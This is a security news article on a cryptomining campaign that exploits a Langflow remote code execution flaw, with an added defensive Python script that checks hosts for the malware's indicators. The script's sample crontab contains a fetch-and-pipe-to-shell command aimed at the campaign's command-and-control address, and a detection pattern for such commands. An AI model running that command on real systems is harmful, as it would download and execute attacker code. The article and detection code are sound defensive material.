Threat Actors Weaponize Critical Langflow Flaw to Deploy Monero Miner
A critical unauthenticated remote code execution (RCE) vulnerability in Langflow, identified as **CVE-2026-33017**, is being actively exploited by threat actors. The campaign targets exposed AI application endpoints to deliver a **Monero** cryptocurrency miner, illustrating how such endpoints give illicit mining operations a new route into enterprise networks.

Threat actors are leveraging **CVE-2026-33017** (CVSS score: 9.3), a severe RCE vulnerability in **Langflow**, to infiltrate systems and deploy a **Monero** cryptocurrency miner. This activity highlights a growing trend where AI application endpoints are being targeted as a vector for initial access to enterprise environments.
### The Attack Vector
The attacks, observed between March 27 and April 15, 2026, exploit the **Langflow** flaw to execute a single line of Python code. This script then downloads and launches a shell script, which in turn fetches and deploys the **Monero** miner binary.
**Trend Micro** researchers Simon Dulude and John Zhang detailed the campaign, noting that the attack chain is designed for efficiency and resilience.
### Malware Capabilities and Evasion
The deployed malware, dubbed "lambsys" by researchers, is engineered to terminate rival cryptocurrency miner processes associated with groups like **Kinsing**, **WatchDog**, **Rocke**, and **Outlaw**. It also deletes competing wallet and key material, disables host-level security controls such as **AppArmor**, **Ubuntu's Uncomplicated Firewall**, **iptables**, and **SELinux**, and establishes cron-based persistence.
The malware communicates with an external server (83.142.209[.]214:80) and can propagate to other systems by reusing SSH keys, transforming a compromised **Langflow** instance into a beachhead for wider network compromise.
### Persistence and Anti-Forensics
To maintain persistence and cover its tracks, the malware removes system logs and manipulates immutable attributes of critical files and directories (e.g., `~/.ssh/`, `/etc/crontab`, `/tmp/`). This reflects an understanding of common cryptojacking tactics and a deliberate effort to evade detection by rival groups and security tools.

The final stage involves fetching a bespoke **XMRig** miner from the command-and-control server. The malware also gathers the host's public IP address and location via `ipinfo[.]io` for operational decisions, such as optimal mining pool selection and potential geo-fencing.
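The indicators in the two sections above (cron-based persistence, immutable attributes set on `~/.ssh/` and `/etc/crontab`, disabled AppArmor/UFW/SELinux, and the outbound connection to 83.142.209[.]214:80) are all checkable from the output of standard Linux commands. The triage helper below is an added example for defenders, not code from Trend Micro or the Langflow project. It parses constructed samples of `lsattr`, crontab, `ss -ntp` and security-tool status output; the sample values, the `/example.sh` path in the constructed cron line, and the exact status wordings matched for UFW, SELinux and AppArmor are assumptions, not artifacts from the campaign.

```python
"""Host triage for the lambsys indicators described in the article (added example)."""
import re
from typing import Dict, List

# Indicators taken from the article; shown there defanged as 83.142.209[.]214 and ipinfo[.]io.
C2_HOST, C2_PORT = "83.142.209.214", 80
GEOLOOKUP_HOST = "ipinfo.io"

# Cron command that downloads a script and pipes it straight into a shell.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def immutable_paths(lsattr_output: str) -> List[str]:
    """Return paths whose `lsattr` flag field contains 'i' (immutable).

    Input lines are in lsattr format: '<flags> <path>'. The malware toggles
    this attribute on ~/.ssh/, /etc/crontab and /tmp/, so an unexpected 'i'
    on those paths is worth a closer look (compare against your own baseline).
    """
    found = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            found.append(parts[1])
    return found


def suspicious_cron_lines(crontab_text: str) -> List[str]:
    """Flag cron entries that fetch-and-execute or reference the C2 address."""
    hits = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if DOWNLOAD_EXEC.search(entry) or C2_HOST in entry:
            hits.append(entry)
    return hits


def c2_connections(ss_output: str) -> List[str]:
    """Flag `ss -ntp` rows whose peer address is the C2 endpoint.

    Column 4 (0-based) of a data row is 'Peer Address:Port'; the header row is skipped.
    """
    hits = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] == "State":
            continue
        host, _, port = cols[4].rpartition(":")
        if host == C2_HOST and port == str(C2_PORT):
            hits.append(line.strip())
    return hits


def disabled_controls(status_outputs: Dict[str, str]) -> List[str]:
    """Given {control: output of its status command}, return controls reporting disabled.

    Markers are the assumed wordings of `ufw status`, `getenforce` and `aa-status`.
    A disabled control is only meaningful against a baseline where it was enabled.
    """
    markers = {
        "ufw": "Status: inactive",
        "selinux": "Disabled",
        "apparmor": "apparmor module is not loaded",
    }
    return [name for name, marker in markers.items()
            if marker.lower() in status_outputs.get(name, "").lower()]


def triage(lsattr_output: str, crontab_text: str, ss_output: str,
           status_outputs: Dict[str, str]) -> Dict[str, List[str]]:
    """Run every check and return only the categories that produced findings."""
    findings = {
        "immutable_paths": immutable_paths(lsattr_output),
        "suspicious_cron": suspicious_cron_lines(crontab_text),
        "c2_connections": c2_connections(ss_output),
        "disabled_controls": disabled_controls(status_outputs),
    }
    return {name: hits for name, hits in findings.items() if hits}


# Constructed sample inputs (not captured from a real host).
SAMPLE_LSATTR = (
    "----i---------e------- /etc/crontab\n"
    "--------------e------- /etc/passwd\n"
    "----i---------e------- /root/.ssh\n"
)
SAMPLE_CRONTAB = (
    "# m h dom mon dow user command\n"
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
    "*/5 * * * * root curl -fsSL http://83.142.209.214/example.sh | sh\n"
)
SAMPLE_SS = (
    "State Recv-Q Send-Q Local Address:Port Peer Address:Port Process\n"
    'ESTAB 0 0 10.0.0.5:51234 83.142.209.214:80 users:(("lambsys",pid=4242,fd=3))\n'
    'ESTAB 0 0 10.0.0.5:22 10.0.0.9:50122 users:(("sshd",pid=911,fd=4))\n'
)
SAMPLE_STATUS = {
    "ufw": "Status: inactive",
    "selinux": "Disabled",
    "apparmor": "apparmor module is loaded.\n5 profiles are loaded.",
}

if __name__ == "__main__":
    for category, hits in triage(SAMPLE_LSATTR, SAMPLE_CRONTAB, SAMPLE_SS, SAMPLE_STATUS).items():
        print(category)
        for hit in hits:
            print("  ", hit)
```

On a live host the same functions take the real output of `lsattr -d /etc/crontab /tmp ~/.ssh`, `cat /etc/crontab` plus each user's crontab, `ss -ntp`, and the three status commands. The immutable-attribute and disabled-control checks only mean something relative to a known-good baseline, since administrators legitimately set `chattr +i` on `/etc/crontab` and not every host runs SELinux or AppArmor; the cron and C2-connection checks are the higher-confidence signals.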
### Evolution of the Threat
**Trend Micro** observed that an earlier version of the `lambsys` binary was compiled in May 2024, suggesting the threat actors have been refining their malware for over two years, focusing on evasion techniques.
This exploitation of **Langflow** is not an isolated incident. In June 2025, another critical vulnerability in **Langflow**, **CVE-2025-3248** (CVSS score: 9.8), was exploited to distribute the **Flodrix** botnet malware.
This campaign underscores the critical need for robust security measures for AI application endpoints, as they are increasingly becoming attractive targets for threat actors seeking new avenues into enterprise networks.